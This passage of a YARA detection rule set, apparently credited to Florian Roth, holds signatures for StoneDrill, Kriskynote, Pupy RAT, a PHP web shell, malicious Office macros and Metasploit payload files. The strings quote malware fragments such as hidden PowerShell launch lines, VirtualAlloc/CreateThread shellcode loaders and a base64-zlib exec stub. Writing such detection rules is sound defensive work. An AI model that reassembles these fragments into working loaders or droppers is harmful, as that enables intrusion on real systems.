+      date = "2017-03-07 10:06:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, MIDDLE_EAST, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "set u100=" ascii
+      $s2 = "set u200=service" ascii fullword
+      $s3 = "set u800=%~dp0" ascii fullword
+      $s4 = "\"%systemroot%\\system32\\%u100%\"" ascii
+      $s5 = "%\" start /b %systemroot%\\system32\\%" ascii
+   condition: 
+      uint32 ( 0 ) == 0x68636540 and 2 of them and filesize < 500
+}
+
+rule StoneDrill_Service_Install_RID3177 : APT DEMO MIDDLE_EAST SCRIPT T1035 {
+   meta:
+      description = "Rule to detect Batch file from StoneDrill report"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+      date = "2017-03-07 13:23:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MIDDLE_EAST, SCRIPT, T1035"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "127.0.0.1 >nul && sc config" ascii
+      $s2 = "LocalService\" && ping -n" ascii fullword
+      $s3 = "127.0.0.1 >nul && sc start" ascii fullword
+      $s4 = "sc config NtsSrv binpath= \"C:\\WINDOWS\\system32\ntssrvr64.exe" ascii
+   condition: 
+      2 of them and filesize < 500
+}
+
+rule StoneDrill_ntssrvr32_RID2EF7 : APT DEMO EXE FILE MAL MIDDLE_EAST {
+   meta:
+      description = "Detects malware from StoneDrill threat report"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+      date = "2017-03-07 11:37:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
+      tags = "APT, DEMO, EXE, FILE, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "g\\system32\\" fullword wide
+      $s2 = "ztvttw" fullword wide
+      $s3 = "lwizvm" fullword ascii
+      $op1 = { 94 35 77 73 03 40 eb e9 } 
+      $op2 = { 80 7c 41 01 00 74 0a 3d } 
+      $op3 = { 74 0a 3d 00 94 35 77 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
+}
+
+rule StoneDrill_RID2B11 : APT DEMO EXE FILE MAL MIDDLE_EAST {
+   meta:
+      description = "Detects malware from StoneDrill_RID2B11 threat report"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+      date = "2017-03-07 08:50:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2bab3716a1f19879ca2e6d98c518debb107e0ed8e1534241f7769193807aac83"
+      hash2 = "62aabce7a5741a9270cddac49cd1d715305c1d0505e620bbeaec6ff9b6fd0260"
+      hash3 = "69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db"
+      tags = "APT, DEMO, EXE, FILE, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C-Dlt-C-Trsh-T.tmp" fullword wide
+      $x2 = "C-Dlt-C-Org-T.vbs" fullword wide
+      $s1 = "Hello dear" fullword ascii
+      $s2 = "WRZRZRAR" fullword ascii
+      $opa1 = { 66 89 45 d8 6a 64 ff } 
+      $opa2 = { 8d 73 01 90 0f bf 51 fe } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or ( all of ( $op* ) and all of ( $s* ) )
+}
+
+rule StoneDrill_VBS_1_RID2CEB : APT DEMO MAL MIDDLE_EAST SCRIPT {
+   meta:
+      description = "Detects malware from StoneDrill threat report"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+      date = "2017-03-07 10:09:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0f4d608a87e36cb0dbf1b2d176ecfcde837070a2b2a049d532d3d4226e0c9587"
+      tags = "APT, DEMO, MAL, MIDDLE_EAST, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "wmic /NameSpace:\\\\root\\default Class StdRegProv Call SetStringValue hDefKey = \"&H80000001\" sSubKeyName = \"Software\\Micros" ascii
+      $x2 = "ping 1.0.0.0 -n 1 -w 20000 > nul" fullword ascii
+      $s1 = "WshShell.CopyFile \"%COMMON_APPDATA%\\Chrome\\" ascii
+      $s2 = "WshShell.DeleteFile \"%temp%\\" ascii
+      $s3 = "WScript.Sleep(10 * 1000)" fullword ascii
+      $s4 = "Set WshShell = CreateObject(\"Scripting.FileSystemObject\") While WshShell.FileExists(\"" ascii
+      $s5 = " , \"%COMMON_APPDATA%\\Chrome\\" ascii
+   condition: 
+      ( filesize < 1KB and 1 of ( $x* ) or 2 of ( $s* ) )
+}
+
+rule Kriskynote_Mar17_1_RID2DBB : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Kriskynote Malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-03-03 10:44:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a19c4b615aa54207604b181873e614d84126b639fee2cce3ca9d5bd863f6f577"
+      hash2 = "62b41db0bf63fa45a2c2b0f5df8c2209a5d96bf2bddf82749595c66d30b7ec61"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "gzwrite64" fullword ascii
+      $opa1 = { e8 6b fd ff ff 83 f8 ff 74 65 83 7b 28 00 74 42 } 
+      $opb1 = { 8a 04 08 8b 8e a4 16 00 00 88 44 24 0c 66 c7 04 } 
+      $opb2 = { 89 4e 6c 89 46 74 e9 ad fc ff ff 8b 46 68 85 c0 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and $s1 and ( $opa1 or all of ( $opb* ) )
+}
+
+rule Kriskynote_Mar17_2_RID2DBC : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Kriskynote Malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-03-03 10:44:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cb9a2f77868b28d98e4f9c1b27b7242fec2f2abbc91bfc21fe0573e472c5dfcb"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "fgjfcn8456fgjhfg89653wetwts" fullword ascii
+      $op0 = { 33 c0 80 34 30 03 40 3d e6 21 00 00 72 f4 b8 e6 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
+}
+
+rule Kriskynote_Mar17_3_RID2DBD : DEMO EXE FILE MAL T1085 {
+   meta:
+      description = "Detects Kriskynote Malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-03-03 10:44:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fc838e07834994f25b3b271611e1014b3593278f0703a4a985fb4234936df492"
+      tags = "DEMO, EXE, FILE, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "rundll32 %s Check" fullword ascii
+      $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs" fullword ascii
+      $s3 = "name=\"IsUserAdmin\"" fullword ascii
+      $s4 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
+}
+
+rule PHP_Webshell_1_Feb17_RID2DF2 : ANOMALY DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a simple cloaked PHP web shell"
+      author = "Florian Roth"
+      reference = "https://isc.sans.edu/diary/Analysis+of+a+Simple+PHP+Backdoor/22127"
+      date = "2017-02-28 10:53:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "ANOMALY, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "<?php ${\"\\x" ascii
+      $x1 = "\";global$auth;function sh_decrypt_phase($data,$key){${\"" ascii
+      $x2 = "global$auth;return sh_decrypt_phase(sh_decrypt_phase($" ascii
+      $x3 = "]}[\"\x64\"]);}}echo " ascii
+      $x4 = "\"=>@phpversion(),\"\\x" ascii
+      $s1 = "$i=Array(\"pv\"=>@phpversion(),\"sv\"" ascii
+      $s3 = "$data = @unserialize(sh_decrypt(@base64_decode($data),$data_key));" ascii
+   condition: 
+      uint32 ( 0 ) == 0x68703f3c and ( $h1 at 0 and 1 of them ) or 2 of them
+}
+
+rule WordDoc_PowerShell_URLDownloadToFile_RID34F4 : DEMO FILE MAL OFFICE SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects Word Document with PowerShell URLDownloadToFile"
+      author = "Florian Roth"
+      reference = "https://www.arbornetworks.com/blog/asert/additional-insights-shamoon2/"
+      date = "2017-02-23 15:52:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "33ee8a57e142e752a9c8960c4f38b5d3ff82bf17ec060e4114f5b15d22aa902e"
+      hash2 = "388b26e22f75a723ce69ad820b61dd8b75e260d3c61d74ff21d2073c56ea565d"
+      hash3 = "71e584e7e1fb3cf2689f549192fe3a82fd4cd8ee7c42c15d736ebad47b028087"
+      tags = "DEMO, FILE, MAL, OFFICE, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $w1 = "Microsoft Forms 2.0 CommandButton" fullword ascii
+      $w2 = "Microsoft Word 97-2003 Document" fullword ascii
+      $p1 = "powershell.exe" fullword ascii
+      $p2 = "URLDownloadToFile" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xcfd0 and 1 of ( $w* ) and all of ( $p* ) )
+}
+
+rule APT_PupyRAT_PY_RID2BF2 : APT DEMO EXE FILE MAL SCRIPT {
+   meta:
+      description = "Detects Pupy RAT"
+      author = "Florian Roth"
+      reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
+      date = "2017-02-17 09:28:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71"
+      tags = "APT, DEMO, EXE, FILE, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "reflective_inject_dll" fullword ascii
+      $x2 = "ImportError: pupy builtin module not found !" fullword ascii
+      $x3 = "please start pupy from either it's exe stub or it's reflective DLLR;" fullword ascii
+      $x4 = "[INJECT] inject_dll." fullword ascii
+      $x5 = "import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))" fullword ascii
+      $op1 = { 8b 42 0c 8b 78 14 89 5c 24 18 89 7c 24 14 3b fd } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20000KB and 1 of them ) or ( 2 of them )
+}
+
+rule APT_MagicHound_MalMacro_RID2F9F : APT DEMO FILE G0059 MAL OFFICE SCRIPT T1059_001 T1086 T1193 T1203 {
+   meta:
+      description = "Detects malicious macro / powershell in Office document"
+      author = "Florian Roth"
+      reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
+      date = "2017-02-17 12:05:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "66d24a529308d8ab7b27ddd43a6c2db84107b831257efb664044ec4437f9487b"
+      hash2 = "e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6"
+      tags = "APT, DEMO, FILE, G0059, MAL, OFFICE, SCRIPT, T1059_001, T1086, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "powershell.exe " fullword ascii
+      $s2 = "CommandButton1_Click" fullword ascii
+      $s3 = "URLDownloadToFile" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xcfd0 and filesize < 8000KB and all of them )
+}
+
+rule ShellCrew_StreamEx_1_RID2EB2 : APT DEMO EXE FILE G0009 {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+      date = "2017-02-10 11:25:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "81f411415aefa5ad7f7ed2365d9a18d0faf33738617afc19215b69c23f212c07"
+      tags = "APT, DEMO, EXE, FILE, G0009"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "cmd.exe /c  \"%s\"" fullword wide
+      $s3 = "uac\\bin\\install_test.pdb" ascii
+      $s5 = "uncompress error:%d %s" fullword ascii
+      $s7 = "%s\\AdobeBak\\Proc.dat" fullword wide
+      $s8 = "e:\\workspace\\boar" fullword ascii
+      $s12 = "$\\data.ini" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 4 of them )
+}
+
+rule ShellCrew_StreamEx_1_msi_RID305A : APT DEMO EXE FILE G0009 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file msi.dll"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+      date = "2017-02-10 12:36:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8c9048e2f5ea2ef9516cac06dc0fba8a7e97754468c0d9dc1e5f7bce6dbda2cc"
+      tags = "APT, DEMO, EXE, FILE, G0009"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "msi.dll.eng" fullword wide
+      $s2 = "ahinovx" fullword ascii
+      $s3 = "jkpsxy47CDEMNSTYbhinqrwx56" fullword ascii
+      $s4 = "PVYdejmrsy12" fullword ascii
+      $s6 = "FLMTUZaijkpsxy45CD" fullword ascii
+      $s7 = "afhopqvw34ABIJOPTYZehmo" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20KB and 3 of them )
+}
+
+rule ShellCrew_StreamEx_1_msi_dll_RID31F5 : APT DEMO FILE G0009 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file msi.dll.eng"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+      date = "2017-02-10 13:44:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "883108119d2f4db066fa82e37aa49ecd2dbdacda67eb936b96720663ed6565ce"
+      hash2 = "5311f862d7c824d13eea8293422211e94fb406d95af0ae51358accd4835aaef8"
+      hash3 = "191cbeffa36657ab1ef3939da023cacbc9de0285bbe7775069c3d6e18b372c3f"
+      tags = "APT, DEMO, FILE, G0009"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "NDOGDUA" fullword ascii
+      $s2 = "NsrdsrN" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x4d9d and filesize < 300KB and all of them )
+}
+
+rule Msfpayloads_msf_2_RID2DCA : APT DEMO METASPLOIT {
+   meta:
+      description = "Metasploit Payloads - file msf.asp"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e52f98466b92ee9629d564453af6f27bd3645e00a9e2da518f5a64a33ccf8eb5"
+      tags = "APT, DEMO, METASPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "& \"\\\" & \"svchost.exe\"" fullword ascii
+      $s2 = "CreateObject(\"Wscript.Shell\")" fullword ascii
+      $s3 = "<% @language=\"VBScript\" %>" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Msfpayloads_msf_3_RID2DCB : APT DEMO METASPLOIT {
+   meta:
+      description = "Metasploit Payloads - file msf.psh"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:47:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "335cfb85e11e7fb20cddc87e743b9e777dc4ab4e18a39c2a2da1aa61efdbd054"
+      tags = "APT, DEMO, METASPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(" ascii
+      $s2 = "public enum MemoryProtection { ExecuteReadWrite = 0x40 }" fullword ascii
+      $s3 = ".func]::VirtualAlloc(0," 
+      $s4 = ".func+AllocationType]::Reserve -bOr [" ascii
+      $s5 = "New-Object System.CodeDom.Compiler.CompilerParameters" fullword ascii
+      $s6 = "ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" fullword ascii
+      $s7 = "public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }" fullword ascii
+      $s8 = ".func]::CreateThread(0,0,$" fullword ascii
+      $s9 = "public enum Time : uint { Infinite = 0xFFFFFFFF }" fullword ascii
+      $s10 = "= [System.Convert]::FromBase64String(\"/" ascii
+      $s11 = "{ $global:result = 3; return }" fullword ascii
+   condition: 
+      4 of them
+}
+
+rule Msfpayloads_msf_4_RID2DCC : APT DEMO METASPLOIT {
+   meta:
+      description = "Metasploit Payloads - file msf.aspx"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:47:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "26b3e572ba1574164b76c6d5213ab02e4170168ae2bcd2f477f246d37dbe84ef"
+      tags = "APT, DEMO, METASPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "= VirtualAlloc(IntPtr.Zero,(UIntPtr)" ascii
+      $s2 = ".Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);" ascii
+      $s3 = "[System.Runtime.InteropServices.DllImport(\"kernel32\")]" fullword ascii
+      $s4 = "private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;" fullword ascii
+      $s5 = "private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);" fullword ascii
+   condition: 
+      4 of them
+}
+
+rule Msfpayloads_msf_exe_2_RID2F6B : APT DEMO METASPLOIT {
+   meta:
+      description = "Metasploit Payloads - file msf-exe.aspx"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 11:56:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3a2f7a654c1100e64d8d3b4cd39165fba3b101bbcce6dd0f70dae863da338401"
+      tags = "APT, DEMO, METASPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "= new System.Diagnostics.Process();" fullword ascii
+      $x2 = ".StartInfo.UseShellExecute = true;" fullword ascii
+      $x3 = ", \"svchost.exe\");" ascii
+      $s4 = " = Path.GetTempPath();" ascii
+   condition: 
+      all of them
+}
+
+rule Msfpayloads_msf_5_RID2DCD : APT DEMO METASPLOIT {
+   meta:
+      description = "Metasploit Payloads - file msf.msi"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:47:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7a6c66dfc998bf5838993e40026e1f400acd018bde8d4c01ef2e2e8fba507065"
+      tags = "APT, DEMO, METASPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "required to install Foobar 1.0." fullword ascii
+      $s2 = "Copyright 2009 The Apache Software Foundation." fullword wide
+      $s3 = "{50F36D89-59A8-4A40-9689-8792029113AC}" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Msfpayloads_msf_6_RID2DCE : APT DEMO METASPLOIT SCRIPT {
+   meta:
+      description = "Metasploit Payloads - file msf.vbs"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:47:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8d6f55c6715c4a2023087c3d0d7abfa21e31a629393e4dc179d31bb25b166b3f"
+      tags = "APT, DEMO, METASPLOIT, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
+      $s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+      $s3 = ".GetSpecialFolder(2)" ascii
+      $s4 = ".Write Chr(CLng(\"" ascii
+      $s5 = "= \"4d5a90000300000004000000ffff00" ascii
+      $s6 = "For i = 1 to Len(" ascii
+      $s7 = ") Step 2" ascii
+   condition: 
+      5 of them
+}
+
+rule Msfpayloads_msf_7_RID2DCF : APT DEMO METASPLOIT SCRIPT {
+   meta:
+      description = "Metasploit Payloads - file msf.vba"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:47:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "425beff61a01e2f60773be3fcb74bdfc7c66099fe40b9209745029b3c19b5f2f"
+      tags = "APT, DEMO, METASPLOIT, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Private Declare PtrSafe Function CreateThread Lib \"kernel32\" (ByVal" ascii
+      $s2 = "= VirtualAlloc(0, UBound(Tsw), &H1000, &H40)" fullword ascii
+      $s3 = "= RtlMoveMemory(" ascii
+   condition: 
+      all of them
+}
+
+rule Msfpayloads_msf_8_RID2DD0 : APT DEMO METASPLOIT SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Metasploit Payloads - file msf.ps1"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:47:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "519717e01f0cb3f460ef88cd70c3de8c7f00fb7c564260bd2908e97d11fde87f"
+      tags = "APT, DEMO, METASPLOIT, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[DllImport(\"kernel32.dll\")]" fullword ascii
+      $s2 = "[DllImport(\"msvcrt.dll\")]" fullword ascii
+      $s3 = "-Name \"Win32\" -namespace Win32Functions -passthru" fullword ascii
+      $s4 = "::VirtualAlloc(0,[Math]::Max($" ascii
+      $s5 = ".Length,0x1000),0x3000,0x40)" ascii
+      $s6 = "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);" fullword ascii
+      $s7 = "::memset([IntPtr]($" ascii
+   condition: 
+      6 of them
+}
+
+rule Msfpayloads_msf_cmd_RID2ECC : APT DEMO METASPLOIT SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Metasploit Payloads - file msf-cmd.ps1"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 11:29:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9f41932afc9b6b4938ee7a2559067f4df34a5c8eae73558a3959dd677cb5867f"
+      tags = "APT, DEMO, METASPLOIT, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e" ascii
+   condition: 
+      all of them
+}
+
+rule Msfpayloads_msf_9_RID2DD1 : APT DEMO FILE METASPLOIT {
+   meta:
+      description = "Metasploit Payloads - file msf.war - contents"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:48:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81"
+      tags = "APT, DEMO, FILE, METASPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1)" fullword ascii
+      $s2 = ".concat(\".exe\");" fullword ascii
+      $s3 = "[0] = \"chmod\";" ascii
+      $s4 = "= Runtime.getRuntime().exec(" ascii
+      $s5 = ", 16) & 0xff;" ascii
+      $x1 = "4d5a9000030000000" ascii
+   condition: 
+      4 of ( $s* ) or ( uint32 ( 0 ) == 0x61356434 and $x1 at 0 )
+}
+
+rule Msfpayloads_msf_10_RID2DF9 : APT DEMO EXE FILE METASPLOIT {
+   meta:
+      description = "Metasploit Payloads - file msf.exe"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:54:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3cd74fa28323c0d64f45507675ac08fb09bae4dd6b7e11f2832a4fbc70bb7082"
+      tags = "APT, DEMO, EXE, FILE, METASPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = { 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 } 
+      $s2 = { 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b } 
+      $s3 = { 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule Msfpayloads_msf_svc_RID2EE4 : APT DEMO EXE FILE METASPLOIT {
+   meta:
+      description = "Metasploit Payloads - file msf-svc.exe"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 11:33:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2b02c9c10577ee0c7590d3dadc525c494122747a628a7bf714879b8e94ae5ea1"
+      tags = "APT, DEMO, EXE, FILE, METASPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "PAYLOAD:" fullword ascii
+      $s2 = ".exehll" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+}
+
+rule Msfpayloads_msf_11_RID2DFA : APT DEMO METASPLOIT {
+   meta:
+      description = "Metasploit Payloads - file msf.hta"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 10:54:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d1daf7bc41580322333a893133d103f7d67f5cd8a3e0f919471061d41cf710b6"
+      tags = "APT, DEMO, METASPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then" fullword ascii
+      $s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+      $s3 = "= CreateObject(\"Wscript.Shell\") " fullword ascii
+   condition: 
+      all of them
+}
+
+rule Msfpayloads_msf_ref_RID2ED5 : APT DEMO METASPLOIT SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Metasploit Payloads - file msf-ref.ps1"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-02-09 11:31:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87"
+      tags = "APT, DEMO, METASPLOIT, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "kernel32.dll WaitForSingleObject)," ascii
+      $s2 = "= ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')" ascii
+      $s3 = "GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object" ascii
+      $s4 = ".DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual'," ascii
+      $s5 = "= [System.Convert]::FromBase64String(" ascii
+      $s6 = "[Parameter(Position = 0, Mandatory = $True)] [Type[]]" fullword ascii
+      $s7 = "DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard," ascii
+   condition: 
+      5 of them
+}
+
+rule RottenPotato_Potato_RID2EDA : DEMO EXE FILE HKTL T1053 T1068 T1134 {
+   meta:
+      description = "Detects a component of privilege escalation tool Rotten Potato - file Potato.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/foxglovesec/RottenPotato"
+      date = "2017-02-07 11:32:11"
+      score = 90
+      customer = "demo"
